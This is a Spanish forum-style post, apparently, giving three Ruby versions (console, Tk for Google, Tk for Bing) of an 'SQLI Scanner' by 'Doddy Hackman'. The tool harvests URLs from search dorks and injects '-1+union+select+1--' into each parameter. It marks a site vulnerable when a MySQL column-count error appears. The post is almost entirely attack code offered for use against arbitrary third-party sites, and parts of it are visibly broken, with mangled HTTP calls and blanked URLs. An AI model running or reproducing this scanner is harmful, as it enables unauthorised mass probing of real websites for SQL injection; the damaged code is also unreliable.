Version consola :
#!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave =, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http =, uri.port) return,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = ""+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def uso print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n" print "-search_bing : Find in Bing\n" print "-search_google : Find in Google\n" print "-scan_bing : Find SQLI in Bing\n" print "-scan_google : Find SQLI in Google\n" print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n" end def head print "\n\n-- == SQLI Scanner 0.4 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end opcion = ARGV[0] dork = ARGV[1] pages = ARGV[2] head() if !opcion or !dork or !pages uso() else if opcion=="-search_bing" print "\n[+] Searching in Bing ...\n\n" links = bing(dork,pages) print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found\n" end links.flatten.each do |link| print "[+] Link : "+link+"\n" end print "\n[+] Finished\n" elsif opcion=="-search_google" print "\n[+] Searching in Google ...\n\n" links = google(dork,pages) if links.count.to_s=="0" print "[+] Searching in Google again ...\n\n" links = google_recursive(dork,pages) end print "[+] Pages Count : "+links.count.to_s if links.count.to_s=="0" print "[-] Links not found" end links.flatten.each do |link| print "[+] Link : "+link+"\n" end print "\n[+] Finished\n" elsif opcion=="-scan_bing" print "\n[+] Searching in Bing ...\n\n" links = cortar(bing(dork,pages)) print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found\n" end links.flatten.each do |link| print "[+] Link : "+link begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ print " [OK]\n\a\a" else print " [FAIL]\n" end rescue print " [FAIL]\n" end end print "\n[+] Finished\n" elsif opcion=="-scan_google" print "\n[+] Searching in Google ...\n\n" links = cortar(google(dork,pages)) if links.count.to_s=="0" print "[+] Searching in Google again ...\n\n" links = cortar(google_recursive(dork,pages)) end print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found" end links.flatten.each do |link| print "[+] Link : "+link begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ print " [OK]\n\a\a" else print " [FAIL]\n" end rescue print " [FAIL]\n" end end print "\n[+] Finished\n" else print "[-] Bad Option" end end copyright() #The End ?
Version Tk para Google :
#!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 #Scan Google Tk require "tk" require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave =, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http =, uri.port) return,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = ""+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end # window = { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" } window['geometry'] = '300x320-20+10' do background "black" foreground "green" text " Dork : " place('relx'=>"0.1",'rely'=>"0.1") end dork ={ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.1) } do background "black" foreground "green" text " Pages : " place('relx'=>"0.1",'rely'=>"0.2") end pages ={ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.2) } do background "black" foreground "green" text "Console" place('relx'=>0.4,'rely'=>0.3) end console do background "black" foreground "green" width 30 height 9 place('relx'=>0.1,'rely'=>0.4) end do text "Search" background "black" foreground "green" width 17 activebackground "green" highlightbackground "green" command proc{ dork = dork.value.to_s pages = pages.value.to_s console.insert("end", "[+] Searching in Google ...\n\n") links = cortar(google(dork,pages)) if links.count.to_s=="0" console.insert("end", "[+] Searching in Google again ...\n\n") links = cortar(google_recursive(dork,pages)) end console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n") if links.count.to_s=="0" console.insert("end", "[-] Links not found") end links.flatten.each do |link| console.insert("end", "[+] Link : "+link) begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ console.insert("end"," [OK]\n\a\a") else console.insert("end"," [FAIL]\n") end rescue console.insert("end", " [FAIL]\n") end end console.insert("end", "\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen :
Version Tk para Bing :
#!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 #Scan Bing Tk require "tk" require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave =, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http =, uri.port) return,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = ""+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end # window = { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" } window['geometry'] = '300x320-20+10' do background "black" foreground "green" text " Dork : " place('relx'=>"0.1",'rely'=>"0.1") end dork ={ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.1) } do background "black" foreground "green" text " Pages : " place('relx'=>"0.1",'rely'=>"0.2") end pages ={ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.2) } do background "black" foreground "green" text "Console" place('relx'=>0.4,'rely'=>0.3) end console do background "black" foreground "green" width 30 height 9 place('relx'=>0.1,'rely'=>0.4) end do text "Search" background "black" foreground "green" width 17 activebackground "green" highlightbackground "green" command proc{ dork = dork.value.to_s pages = pages.value.to_s console.insert("end", "[+] Searching in Bing ...\n\n") links = cortar(bing(dork,pages)) console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n") if links.count.to_s=="0" console.insert("end","[-] Links not found\n") end links.flatten.each do |link| console.insert("end", "[+] Link : "+link) begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ console.insert("end"," [OK]\n\a\a") else console.insert("end", " [FAIL]\n") end rescue console.insert("end"," [FAIL]\n") end end console.insert("end", "\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen :
Eso es todo.